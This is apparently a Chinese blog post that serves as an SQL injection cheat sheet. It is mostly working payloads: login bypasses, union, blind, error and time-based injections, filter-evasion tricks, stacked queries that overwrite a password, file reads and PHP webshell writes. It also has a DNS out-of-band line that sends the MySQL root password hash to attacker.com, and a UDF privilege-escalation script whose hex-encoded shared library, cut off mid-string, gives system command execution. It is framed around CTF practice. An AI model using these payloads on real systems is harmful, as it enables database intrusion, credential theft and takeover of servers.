SQL注入

2020-05-16 web SQL, 注入 ∞ 评论

万能密码

admin' --
admin' #
admin'/\*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1-- 
1'^1#       (False注入)

手注

正常注入步骤（联合查询）

查库名->查表名->查列名（字段名）->查值（数据）

字段数量猜解
1
order by 4 --+
判断页面回显数据字段位置
1
union select 1,2,3,4,x... --+

数据库名

select database()
select schema_name from information_schema.schemata;

-- MySQL8新特性(>8.0.21)
table information_schema.TABLESPACES_EXTENSIONS

表名

1	union select 1,2,group_concat(table_name),4,xxxx from information_schema.tables where table_schema=database()

union查询

UNION SELECT TABLE_NAME FROM information_schema.tables WHERE TABLE_SCHEMA=database();   /* 列出所有用户自定义数据库中的表 */

-- MySQL 4版本时用version=9，MySQL 5版本时用version=10
UNION SELECT GROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;   /* 列出当前数据库中的表 */
SELECT table_schema, table_name FROM information_schema.tables WHERE table_schema!='information_schema' AND table_schema!='mysql';

盲注

AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'

-- MySQL8新特性
and (table information_schema.TABLESPACES_EXTENSIONS limit 1,1)>(BINARY('a'),'0')#

报错

1
2

AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM information_schema.tables LIMIT 1)));
-- 在5.1.5版本中成功。

列名（字段名）

Union select 1,2,group_concat(column_name),4,xxxx from information_schema.columns where table_schema=database() and table_name=(table_name) /*此处的表名为字符串型，也通过十六进制表示*/

union查询

1	UNION SELECT GROUP_CONCAT(column_name) FROM information_schema.columns WHERE table_name = 'tablename'

盲注

1	AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

报错

-- 在5.1.5版本中成功
AND (1,2,3) = (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)
-- MySQL 5.1版本修复了
AND(SELECT COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2))) (@:=1)||@ GROUP BY CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@) HAVING @||MIN(@:=0); AND ExtractValue(1, CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT 1)));

值查询

Union select 1,2,column_name,4,xxx from (database_name.)table_name

-- MySQL8新特性
and (table flag limit 1,1)>(BINARY('a'))#

无回显

盲注

布尔盲注

使用场景：对真/假条件返回的内容很容易区分。

(where | and) if(substr((select password from users where username='admin'),1,1)='a',1,0)

select * from users where username=nouser or length(database())>8
select * from users where username=nouser or ascii(substr(database(),1,1))<130

-- 通配符
select * from users where username='xxx' and passwd='-1' or passwd like '{}%'#

时间盲注

依赖于通过页面返回的延迟时间来判断条件是否正确。

通常可利用的产生时间延迟的函数有：sleep()、benchmark()，还有许多进行复杂运算的函数也可以当做延迟的判断标准、笛卡尔积合并数据表、GET_LOCK双SESSION产生延迟等方法。

-- sleep()
(where | and) if(substr((select password from users where username='admin'),1,1)='a',sleep(3),1)

select * from users where username=$username (and | or) if(length(database())>8,sleep(3),1)

-- benchmark()
or benchmark(5000000,md5('test'))
or if(length(database())>5,benchmark(1500000,md5('test')),1)

-- pg_sleep()
(and | or) (case when (select substr(password,1,1) from users)='a' then pg_sleep(5) else pg_sleep(0) end)

and (select case when(substr((select password from users where username='admin'),1,1)='a') then (select 'roarctf' from pg_sleep(3)) else '1' end)='roarctf'

-- 笛卡尔积 heavy query
select * from users where id=1 and 1>(select count(*) from information_schema.columns A, information_schema.columns B, information_schema.columns C);
select * from users where id=1 and if(1,concat(rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a'),rpad(1,999999,'a')) RLIKE '(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+b',0) and '1'='1';

报错注入

通过特殊函数的错误使用使其参数被页面输出。

前提：服务器开启报错信息返回，也就是发生错误时返回报错信息。

常见的利用函数有：exp()、floor()+rand()、updatexml()、extractvalue()等。

(where|and|or) exp(~(select * from(select user())a));
(where|and|or) pow(~(select * from(select user())a),9999);
(where|and|or) updatexml(1,concat(0x7e,(select user()),0x7e),1);
(where|and|or) extractvalue(1,concat(0x7e,(select user()),0x7e));
(where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)));
(where|and|or) (select count(*) from information_schema.tables group by concat((select user()),0x7e,ceil(rand(0)*2)));

limit注入

使用 PROCEDURE函数进行注入，ANALYSE支持两个参数。

1
2
3

select id from users order by id desc limit 0,1 procedure analyse(1,1);
select id from users order by id desc limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);
select id from users order by id desc limit 0,1 into outfile "/var/www/html/1.php" LINES TERMINATED BY 0x16进制文件

update注入

1
2
3

#盲注
update users set username = '0'|if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1) where id=15;
update users set username = '0' | (substr(user(),1,1) regexp 0x5e5b6d2d7a5d) where id=14;

insert注入

1
2
3

#盲注
insert into users values (16,'K0rz3n','0'| if((substr(user(),1,1) regexp 0x5e5b6d2d7a5d), sleep(5), 1));
insert into users values (15,'K0rz3n','0'| (substr(user(),1,1) regexp 0x5e5b6d2d7a5d));

order by注入

#报错注入
select * from users order by updatexml(1,concat(0x7e,(select%20user()),0x7e),1);

#盲注
select * from users order by id ^(select(select version()) regexp '^5');

group by注入

1 2	#盲注 select * from users group by 1 having substr((select database()),1,1)='c'

宽字节注入

国内最常使用的 GBK 编码，这种方式主要是绕过 addslashes 等对特殊字符进行转移的绕过。反斜杠 \ 的十六进制为 %5c，在你输入 %bf%27 时，函数遇到单引号自动转移加入 \，此时变为 %bf%5c%27，%bf%5c 在 GBK 中变为一个宽字符「縗」。%bf 那个位置可以是 %81-%fe 中间的任何字符。不止在 SQL 注入中，宽字符注入在很多地方都可以应用。

GET方式：利用URLencode ?id=1%df'||1={payload}%23

POST方式：利用UTF-16或UTF-32或中文 ?id=1我'||1={payload}#

堆叠注入

由于分号;为MYSQL语句的结束符。若在支持多语句执行的情况下，可利用此方法执行其他恶意语句，如RENAME、DROP等。

1;show databases;#
1;show tables;#
1;show columns from [表名];#

1;update`ctfshow_user`set`pass`=(0x31323334)where(username=0x61646d696e)

/*预处理*/
1;PREPARE hacker from char(117,112,100,97,116,101,96,99,116,102,115,104,111,119,95,117,115,101,114,96,115,101,116,96,112,97,115,115,96,61,40,48,120,51,49,51,50,51,51,51,52,41,119,104,101,114,101,40,117,115,101,114,110,97,109,101,61,48,120,54,49,54,52,54,100,54,57,54,101,41);EXECUTE hacker;#
1;PREPARE hacker from 0x7570646174656063746673686f775f75736572607365746070617373603d283078333133323333333429776865726528757365726e616d653d30783631363436643639366529;EXECUTE hacker;#

1';SET @sqli=char(117,112,100,97,116,101,96,99,116,102,115,104,111,119,95,117,115,101,114,96,115,101,116,96,112,97,115,115,96,61,40,48,120,51,49,51,50,51,51,51,52,41,119,104,101,114,101,40,117,115,101,114,110,97,109,101,61,48,120,54,49,54,52,54,100,54,57,54,101,41);PREPARE hacker from @sqli;EXECUTE hacker;#
1';SET @sqli=0x7570646174656063746673686f775f75736572607365746070617373603d283078333133323333333429776865726528757365726e616d653d30783631363436643639366529;PREPARE hacker from @sqli;EXECUTE hacker;#

二次注入

攻击者构造的恶意数据存储到数据库后，恶意数据被读取并进入到SQL查询语句所导致的注入。

现在通常Web应用程序大多都会进行参数过滤，来防止注入。如果某处使用了urldecode()或者 rawurldecode()函数，则会导致二次解码生成单引号二引发注入，即二次注入。
Web应用程序通常使用addslashes() 、mysql_real_escape_string()、mysql_escape_string()函数或者开启GPC来防止注入，也就是给单引号(‘’)、双引号(“”)、反斜杠()和NULL加上反斜杠转义。
addslashes函数虽然在过滤之后会添加 “\” 进行转义，但是 “\” 并不会被带到数据库中

二次urldecode注入
单引号：%25%27
双引号：%25%22

文件操作

读文件：

SELECT LOAD_FILE('/etc/passwd')

SELECT LOAD_FILE(0x2f666c6167)

写文件：

SELECT '<?php phpinfo();?>' into outfile '/var/www/html/phpinfo.php'

select version() into outfile "/var/www/html/test.php" LINES TERMINATED BY 0x16进制文件

Rogue Mysql Server

搭建恶意mysql服务器读取文件。

https://github.com/allyshka/Rogue-MySql-Server

Quine

Quine又叫做自产生程序，在sql注入技术中，这是一种使得输入的sql语句和输出的sql语句一致的技术，常用于一些特殊的登陆绕过sql注入中。

参考：从三道赛题再谈Quine trick

1
2
3

SELECT REPLACE(REPLACE('REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")',CHAR(34),CHAR(39)),CHAR(46),'REPLACE(REPLACE(".",CHAR(34),CHAR(39)),CHAR(46),".")');

-- CHAR => 0x

绕过（bypass）

空格

多层括号嵌套
改用+号
使用注释代替（/*注释内容*/、/*! MYSQL专属*/）
and/or后面可以跟上偶数个!、~可以替代空格，也可以混合使用(规律又不同)，and/or前的空格可用省略
%09, %0a, %0b, %0c, %0d, %a0等部分不可见字符可也代替空格

单双引号

需要跳出单引号的情况：尝试是否存在编码问题而产生的SQL注入。
不需要跳出单引号的情况：字符串可用16进制表示、也可通过进制转换函数表示成其他进制。

-- hex 编码
SELECT * FROM Users WHERE username = 0x61646D696E
-- char() 函数
SELECT * FROM Users WHERE username = CHAR(97, 100, 109, 105, 110)

逗号

采用 substr((database())from({})for(1)) 的形式
采用join：union select * from ((select 1)a join (select 2)b join (select 3)c);

等号

like
用regexp或者in
<>

and / or

双写anandd、oorr
使用运算符代替&&、||
直接拼接=号，如：?id=1=(condition)
其他方法，如：?id=1^(condition)、?id=1)xor(condition)

union

盲注：'and(select pass from users limit 1)='secret

select

有文件读取权限

1 2	' and substr(load_file('file'),locate('DocumentRoot',(load_file('file')))+ length('DocumentRoot'),10)='a'='' into outfile '/var/www/dump.txt

获取列名

1
2
3

' and 列名 is not null#
' procedure analyse()#
'and substr(pass,1,1)='a  /*使用substr来做过滤条件*/

handler语句代替select查询

/*通过handler语句查询users表的内容*/
handler users open as yunensec; /*指定数据表进行载入并将返回句柄重命名*/
handler yunensec read first; /*读取指定表/句柄的首行数据*/
handler yunensec read next; /*读取指定表/句柄的下一行数据*/
handler yunensec read next; /*读取指定表/句柄的下一行数据*/
...
handler yunensec close; /*关闭句柄*/

limit

1
2
3

'and(select pass from users where id=1)='a
'and(select pass from users group by id having id=1)='a
'and length((select pass from users having substr(pass,1,1)='a'))

where

join/left join/right join...on...

information_schema

替代表：sys.x$schema_flattened_keys 、sys.schema_table_statistics

as

database() => schema()

if

case when

其他关键字

双写绕过关键字过滤
1. 使用同义函数/语句代替，如if函数可用case when condition then 1 else 0 end语句代替。
2. 使用 CONCAT() 时，任何个参数为 null，将返回 null，推荐使用 CONCAT_WS()。CONCAT_WS()函数第一个参数表示用哪个字符间隔所查询的结果。
  1
  2
  3
  4
  SELECT 'a' 'd' 'mi' 'n';
  SELECT CONCAT('a', 'd', 'm', 'i', 'n');
  SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');
  SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');

括号

order by 大小比较盲注

数字

用true换1

1 2	def cal(x): return ('('+'(true)+'*x)[:-1]+')'

替换表

代替字符	数	代替字符	数	代替字符	数	数	代替字符
false、!pi()	0	ceil(pi()*pi())	10	A	ceil((pi()+pi())*pi())	20	K
true、!(!pi())	1	ceil(pi()*pi())+true	11	B	ceil(ceil(pi())*version())	21	L
true+true	2	ceil(pi()+pi()+version())	12	C	ceil(pi()*ceil(pi()+pi()))	22	M
floor(pi())、~~pi()	3	floor(pi()*pi()+pi())	13	D	ceil((pi()+ceil(pi()))*pi())	23	N
ceil(pi())	4	ceil(pi()*pi()+pi())	14	E	ceil(pi())*ceil(version())	24	O
floor(version()) //注意版本	5	ceil(pi()*pi()+version())	15	F	floor(pi()*(version()+pi()))	25	P
ceil(version())	6	floor(pi()*version())	16	G	floor(version()*version())	26	Q
ceil(pi()+pi())	7	ceil(pi()*version())	17	H	ceil(version()*version())	27	R
floor(version()+pi())	8	ceil(pi()*version())+true	18	I	ceil(pi()pi()pi()-pi())	28	S
floor(pi()*pi())	9	floor((pi()+pi())*pi())	19	J	floor(pi()pi()floor(pi()))	29	T

mysql系统库

#查询所有非系统自带数据库、表、列
select table_schema,table_name,column_name from information_schema.columns where table_schema not in ('sys','mysql','information_schema','performance_schema')

#查询指定库的表
select group_concat(table_name) from mysql.innodb_table_stats where database_name=database()
select group_concat(table_name) from sys.schema_auto_increment_columns where table_schema=database()

sys系统库

#查询所有的库：
SELECT table_schema FROM sys.schema_table_statistics GROUP BY table_schema;
SELECT table_schema FROM sys.x$schema_flattened_keys GROUP BY table_schema;

#查询指定库的表（若无则说明此表从未被访问）：
SELECT table_name FROM sys.schema_table_statistics WHERE table_schema='mspwd' GROUP BY table_name;
SELECT table_name FROM sys.x$schema_flattened_keys WHERE table_schema='mspwd' GROUP BY table_name;

#统计所有访问过的表次数:库名,表名,访问次数
select table_schema,table_name,sum(io_read_requests+io_write_requests) io from sys.schema_table_statistics group by table_schema,table_name order by io desc;

#查看所有正在连接的用户详细信息:连接的用户(连接的用户名,连接的ip),当前库,用户状态(Sleep就是空闲),现在在执行的sql语句,上一次执行的sql语句,已经建立连接的时间(秒)
SELECT user,db,command,current_statement,last_statement,time FROM sys.session;

#查看所有曾连接数据库的IP,总连接次数
SELECT host,total_connections FROM sys.host_summary;

#查看语句的执行记录
SELECT * from sys.x$statement_analysis;

无列名注入（or / column 被过滤）

select group_concat(`2`) from (select 1,2,3 union select * from user)x;
select `2` from (select 1,2,3 union select * from user)x limit 1,1;
select ((select 1,'ae',0)>(select * from user));
union all select * from (select * from users as a join users b using(id,username))c--+
extractvalue(1,concat(0x7e,(select*from (select*from output a join output b)c)))#

参考文

https://xz.aliyun.com/t/7169

DNS带外注入（OOB）

out-of-band带外数据（OOB）与inband相反，它是一种通过其他传输方式来窃取数据的技术（例如利用DNS解析协议和电子邮件）。OOB技术通常需要易受攻击的实体生成出站TCP/UDP/ICMP请求，然后允许攻击者泄露数据。OOB攻击的成功基于出口防火墙规则，即是否允许来自易受攻击的系统和外围防火墙的出站请求。而从域名服务器（DNS）中提取数据，则被认为是最隐蔽有效的方法。

利用原理：

利用条件：

需要Windows环境

1、DBMS中需要有可用的，能直接或间接引发DNS解析过程的子程序，即使用到UNC

2、Linux没有UNC路径，所以当处于Linux环境，不能使用该方式获取数据

工具：

DNSLog.cn

CEYE

#secure_file_priv指定文件夹或为空（没有设置）（mysql>5.5.53默认null，禁用导入导出）
#查询secure_file_priv
select @@secure_file_priv;
select @@global.secure_file_priv;
show variables like "secure_file_priv";

#注入
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.attacker.com\\foobar'));
select load_file(concat(0x5c5c5c5c,(select database()),0x2E62383862306437653533326238663635333164322E642E7A6861636B2E63615C5C612E747874));

UDF

UDF是mysql的一个拓展接口，UDF（Userdefined function）可翻译为用户自定义函数，这个是用来拓展Mysql的技术手段。当我们有读取和写入权限以后，我们就可以尝试使用UDF提权的方法，从数据库的root权限提升到系统的管理员权限。

参考：

Mysql UDF 提权

MySQL UDF提权十六进制查询

show variables like '%plugin%';
# 通常是/usr/lib/mysql/plugin/

select unhex('udf.so的十六进制') into dumpfile
'/usr/lib/mysql/plugin/mysqludf.so';

create function sys_eval returns string soname 'mysqludf.so';

select sys_eval('whoami');

#参考脚本
#环境：Linux/MariaDB
import requests

url='http://15700a19-71aa-4c90-b3ca-b6db9d77c56d.chall.ctf.show/api/?id='
code='7F454C4602010100000000000000000003003E0001000000800A000000000000400000000000000058180000000000000000000040003800060040001C0019000100000005000000000000000000000000000000000000000000000000000000C414000000000000C41400000000000000002000000000000100000006000000C814000000000000C814200000000000C8142000000000004802000000000000580200000000000000002000000000000200000006000000F814000000000000F814200000000000F814200000000000800100000000000080010000000000000800000000000000040000000400000090010000000000009001000000000000900100000000000024000000000000002400000000000000040000000000000050E574640400000044120000000000004412000000000000441200000000000084000000000000008400000000000000040000000000000051E5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000040000001400000003000000474E5500D7FF1D94176ABA0C150B4F3694D2EC995AE8E1A8000000001100000011000000020000000700000080080248811944C91CA44003980468831100000013000000140000001600000017000000190000001C0000001E000000000000001F00000000000000200000002100000022000000230000002400000000000000CE2CC0BA673C7690EBD3EF0E78722788B98DF10ED971581CA868BE12BBE3927C7E8B92CD1E7066A9C3F9BFBA745BB073371974EC4345D5ECC5A62C1CC3138AFF3B9FD4A0AD73D1C50B5911FEAB5FBE1200000000000000000000000000000000000000000000000000000000000000000300090088090000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000CD00000012000000000000000000000000000000000000001E0100001200000000000000000000000000000000000000620100001200000000000000000000000000000000000000E30000001200000000000000000000000000000000000000B90000001200000000000000000000000000000000000000680100001200000000000000000000000000000000000000160000002200000000000000000000000000000000000000540000001200000000000000000000000000000000000000F00000001200000000000000000000000000000000000000B200000012000000000000000000000000000000000000005A01000012000000000000000000000000000000000000005201000012000000000000000000000000000000000000004C0100001200000000000000000000000000000000000000E800000012000B00D10D000000000000D1000000000000003301000012000B00A90F0000000000000A000000000000001000000012000C00481100000000000000000000000000007800000012000B009F0B0000000000004C00000000000000FF0000001200090088090000000000000000000000000000800100001000F1FF101720000000000000000000000000001501000012000B00130F0000000000002F000000000000008C0100001000F1FF201720000000000000000000000000009B00000012000B00480C0000000000000A000000000000002501000012000B00420F0000000000006700000000000000AA00000012000B00520C00000000000063000000000000005B00000012000B00950B0000000000000A000000000000008E00000012000B00EB0B0000000000005D00000000000000790100001000F1FF101720000000000000000000000000000501000012000B00090F0000000000000A00000000000000C000000012000B00B50C000000000000F100000000000000F700000012000B00A20E00000000000067000000000000003900000012000B004C0B0000000000004900000000000000D400000012000B00A60D0000000000002B000000000000004301000012000B00B30F0000000000005501000000000000005F5F676D6F6E5F73746172745F5F005F66696E69005F5F6378615F66696E616C697A65005F4A765F5265676973746572436C6173736573006C69625F6D7973716C7564665F7379735F696E666F5F696E6974006D656D637079006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F007379735F6765745F696E6974007379735F6765745F6465696E6974007379735F67657400676574656E76007374726C656E007379735F7365745F696E6974006D616C6C6F63007379735F7365745F6465696E69740066726565007379735F73657400736574656E76007379735F657865635F696E6974007379735F657865635F6465696E6974007379735F657865630073797374656D007379735F6576616C5F696E6974007379735F6576616C5F6465696E6974007379735F6576616C00706F70656E007265616C6C6F63007374726E6370790066676574730070636C6F7365006C6962632E736F2E36005F6564617461005F5F6273735F7374617274005F656E6400474C4942435F322E322E3500000000000000000000020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001006F0100001000000000000000751A6909000002009101000000000000F0142000000000000800000000000000F0142000000000007816200000000000060000000200000000000000000000008016200000000000060000000300000000000000000000008816200000000000060000000A0000000000000000000000A81620000000000007000000040000000000000000000000B01620000000000007000000050000000000000000000000B81620000000000007000000060000000000000000000000C01620000000000007000000070000000000000000000000C81620000000000007000000080000000000000000000000D01620000000000007000000090000000000000000000000D816200000000000070000000A0000000000000000000000E016200000000000070000000B0000000000000000000000E816200000000000070000000C0000000000000000000000F016200000000000070000000D0000000000000000000000F816200000000000070000000E00000000000000000000000017200000000000070000000F00000000000000000000000817200000000000070000001000000000000000000000004883EC08E8EF000000E88A010000E8750700004883C408C3FF35F20C2000FF25F40C20000F1F4000FF25F20C20006800000000E9E0FFFFFFFF25EA0C20006801000000E9D0FFFFFFFF25E20C20006802000000E9C0FFFFFFFF25DA0C20006803000000E9B0FFFFFFFF25D20C20006804000000E9A0FFFFFFFF25CA0C20006805000000E990FFFFFFFF25C20C20006806000000E980FFFFFFFF25BA0C20006807000000E970FFFFFFFF25B20C20006808000000E960FFFFFFFF25AA0C20006809000000E950FFFFFFFF25A20C2000680A000000E940FFFFFFFF259A0C2000680B000000E930FFFFFFFF25920C2000680C000000E920FFFFFF4883EC08488B05ED0B20004885C07402FFD04883C408C390909090909090909055803D680C2000004889E5415453756248833DD00B200000740C488D3D2F0A2000E84AFFFFFF488D1D130A20004C8D25040A2000488B053D0C20004C29E348C1FB034883EB014839D873200F1F4400004883C0014889051D0C200041FF14C4488B05120C20004839D872E5C605FE0B2000015B415CC9C3660F1F84000000000048833DC009200000554889E5741A488B054B0B20004885C0740E488D3DA7092000C9FFE00F1F4000C9C39090554889E54883EC3048897DE8488975E0488955D8488B45E08B0085C07421488D0DE7050000488B45D8BA320000004889CE4889C7E89BFEFFFFC645FF01EB04C645FF000FB645FFC9C3554889E548897DF8C9C3554889E54883EC3048897DF8488975F0488955E848894DE04C8945D84C894DD0488D0DCA050000488B45E8BA1F0000004889CE4889C7E846FEFFFF488B45E048C7001E000000488B45E8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F801751C488B45F0488B40088B0085C0750E488B45F8C60001B800000000EB20488D0D83050000488B45E8BA2B0000004889CE4889C7E8DFFDFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC4048897DE8488975E0488955D848894DD04C8945C84C894DC0488B45E0488B4010488B004889C7E8BBFDFFFF488945F848837DF8007509488B45C8C60001EB16488B45F84889C7E84BFDFFFF4889C2488B45D0488910488B45F8C9C3554889E54883EC2048897DF8488975F0488955E8488B45F08B0083F8027425488D0D05050000488B45E8BA1F0000004889CE4889C7E831FDFFFFB801000000E9AB000000488B45F0488B40088B0085C07422488D0DF2040000488B45E8BA280000004889CE4889C7E8FEFCFFFFB801000000EB7B488B45F0488B40084883C004C70000000000488B45F0488B4018488B10488B45F0488B40184883C008488B00488D04024883C0024889C7E84BFCFFFF4889C2488B45F848895010488B45F8488B40104885C07522488D0DA4040000488B45E8BA1A0000004889CE4889C7E888FCFFFFB801000000EB05B800000000C9C3554889E54883EC1048897DF8488B45F8488B40104885C07410488B45F8488B40104889C7E811FCFFFFC9C3554889E54883EC3048897DE8488975E0488955D848894DD0488B45E8488B4010488945F0488B45E0488B4018488B004883C001480345F0488945F8488B45E0488B4018488B10488B45E0488B4010488B08488B45F04889CE4889C7E8EFFBFFFF488B45E0488B4018488B00480345F0C60000488B45E0488B40184883C008488B10488B45E0488B40104883C008488B08488B45F84889CE4889C7E8B0FBFFFF488B45E0488B40184883C008488B00480345F8C60000488B4DF8488B45F0BA010000004889CE4889C7E892FBFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0DC2020000488B45D8BA2B0000004889CE4889C7E81EFBFFFFB801000000C9C3554889E548897DF8C9C3554889E54883EC2048897DF8488975F0488955E848894DE0488B45F0488B4010488B004889C7E882FAFFFF4898C9C3554889E54883EC3048897DE8488975E0488955D8C745FC00000000488B45E08B0083F801751F488B45E0488B40088B55FC48C1E2024801D08B0085C07507B800000000EB20488D0D22020000488B45D8BA2B0000004889CE4889C7E87EFAFFFFB801000000C9C3554889E548897DF8C9C3554889E54881EC500400004889BDD8FBFFFF4889B5D0FBFFFF488995C8FBFFFF48898DC0FBFFFF4C8985B8FBFFFF4C898DB0FBFFFFBF01000000E8BEF9FFFF488985C8FBFFFF48C745F000000000488B85D0FBFFFF488B4010488B00488D352C0200004889C7E852FAFFFF488945E8EB63488D85E0FBFFFF4889C7E8BDF9FFFF488945F8488B45F8488B55F04801C2488B85C8FBFFFF4889D64889C7E80CFAFFFF488985C8FBFFFF488D85E0FBFFFF488B55F0488B8DC8FBFFFF4801D1488B55F84889C64889CFE8D1F9FFFF488B45F8480145F0488B55E8488D85E0FBFFFFBE000400004889C7E831F9FFFF4885C07580488B45E84889C7E850F9FFFF488B85C8FBFFFF0FB60084C0740A4883BDC8FBFFFF00750C488B85B8FBFFFFC60001EB2B488B45F0488B95C8FBFFFF488D0402C60000488B85C8FBFFFF4889C7E8FBF8FFFF488B95C0FBFFFF488902488B85C8FBFFFFC9C39090909090909090554889E5534883EC08488B05A80320004883F8FF7419488D1D9B0320000F1F004883EB08FFD0488B034883F8FF75F14883C4085BC9C390904883EC08E84FF9FFFF4883C408C300004E6F20617267756D656E747320616C6C6F77656420287564663A206C69625F6D7973716C7564665F7379735F696E666F29000000000000006C69625F6D7973716C7564665F7379732076657273696F6E20302E302E33000045787065637465642065786163746C79206F6E6520737472696E67207479706520706172616D6574657200000000000045787065637465642065786163746C792074776F20617267756D656E74730000457870656374656420737472696E67207479706520666F72206E616D6520706172616D6574657200436F756C64206E6F7420616C6C6F63617465206D656D6F7279007200011B033B800000000F00000008F9FFFF9C00000051F9FFFFBC0000005BF9FFFFDC000000A7F9FFFFFC00000004FAFFFF1C0100000EFAFFFF3C01000071FAFFFF5C01000062FBFFFF7C0100008DFBFFFF9C0100005EFCFFFFBC010000C5FCFFFFDC010000CFFCFFFFFC010000FEFCFFFF1C02000065FDFFFF3C0200006FFDFFFF5C0200001400000000000000017A5200017810011B0C0708900100001C0000001C00000064F8FFFF4900000000410E108602430D0602440C070800001C0000003C0000008DF8FFFF0A00000000410E108602430D06450C07080000001C0000005C00000077F8FFFF4C00000000410E108602430D0602470C070800001C0000007C000000A3F8FFFF5D00000000410E108602430D0602580C070800001C0000009C000000E0F8FFFF0A00000000410E108602430D06450C07080000001C000000BC000000CAF8FFFF6300000000410E108602430D06025E0C070800001C000000DC0000000DF9FFFFF100000000410E108602430D0602EC0C070800001C000000FC000000DEF9FFFF2B00000000410E108602430D06660C07080000001C0000001C010000E9F9FFFFD100000000410E108602430D0602CC0C070800001C0000003C0100009AFAFFFF6700000000410E108602430D0602620C070800001C0000005C010000E1FAFFFF0A00000000410E108602430D06450C07080000001C0000007C010000CBFAFFFF2F00000000410E108602430D066A0C07080000001C0000009C010000DAFAFFFF6700000000410E108602430D0602620C070800001C000000BC01000021FBFFFF0A00000000410E108602430D06450C07080000001C000000DC0100000BFBFFFF5501000000410E108602430D060350010C0708000000000000000000FFFFFFFFFFFFFFFF0000000000000000FFFFFFFFFFFFFFFF00000000000000000000000000000000F01420000000000001000000000000006F010000000000000C0000000000000088090000000000000D000000000000004811000000000000F5FEFF6F00000000B8010000000000000500000000000000E805000000000000060000000000000070020000000000000A000000000000009D010000000000000B000000000000001800000000000000030000000000000090162000000000000200000000000000380100000000000014000000000000000700000000000000170000000000000050080000000000000700000000000000F0070000000000000800000000000000600000000000000009000000000000001800000000000000FEFFFF6F00000000D007000000000000FFFFFF6F000000000100000000000000F0FFFF6F000000008607000000000000F9FFFF6F0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000F81420000000000000000000000000000000000000000000B609000000000000C609000000000000D609000000000000E609000000000000F609000000000000060A000000000000160A000000000000260A000000000000360A000000000000460A000000000000560A000000000000660A000000000000760A0000000000004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D3429004743433A2028474E552920342E342E3720323031323033313320285265642048617420342E342E372D31372900002E73796D746162002E737472746162002E7368737472746162002E6E6F74652E676E752E6275696C642D6964002E676E752E68617368002E64796E73796D002E64796E737472002E676E752E76657273696F6E002E676E752E76657273696F6E5F72002E72656C612E64796E002E72656C612E706C74002E696E6974002E74657874002E66696E69002E726F64617461002E65685F6672616D655F686472002E65685F6672616D65002E63746F7273002E64746F7273002E6A6372002E646174612E72656C2E726F002E64796E616D6963002E676F74002E676F742E706C74002E627373002E636F6D6D656E7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001B0000000700000002000000000000009001000000000000900100000000000024000000000000000000000000000000040000000000000000000000000000002E000000F6FFFF6F0200000000000000B801000000000000B801000000000000B400000000000000030000000000000008000000000000000000000000000000380000000B000000020000000000000070020000000000007002000000000000780300000000000004000000020000000800000000000000180000000000000040000000030000000200000000000000E805000000000000E8050000000000009D0100000000000000000000000000000100000000000000000000000000000048000000FFFFFF6F0200000000000000860700000000000086070000000000004A0000000000000003000000000000000200000000000000020000000000000055000000FEFFFF6F0200000000000000D007000000000000D007000000000000200000000000000004000000010000000800000000000000000000000000000064000000040000000200000000000000F007000000000000F00700000000000060000000000000000300000000000000080000000000000018000000000000006E000000040000000200000000000000500800000000000050080000000000003801000000000000030000000A000000080000000000000018000000000000007800000001000000060000000000000088090000000000008809000000000000180000000000000000000000000000000400000000000000000000000000000073000000010000000600000000000000A009000000000000A009000000000000E0000000000000000000000000000000040000000000000010000000000000007E000000010000000600000000000000800A000000000000800A000000000000C80600000000000000000000000000001000000000000000000000000000000084000000010000000600000000000000481100000000000048110000000000000E000000000000000000000000000000040000000000000000000000000000008A00000001000000020000000000000058110000000000005811000000000000EC0000000000000000000000000000000800000000000000000000000000000092000000010000000200000000000000441200000000000044120000000000008400000000000000000000000000000004000000000000000000000000000000A0000000010000000200000000000000C812000000000000C812000000000000FC01000000000000000000000000000008000000000000000000000000000000AA000000010000000300000000000000C814200000000000C81400000000000010000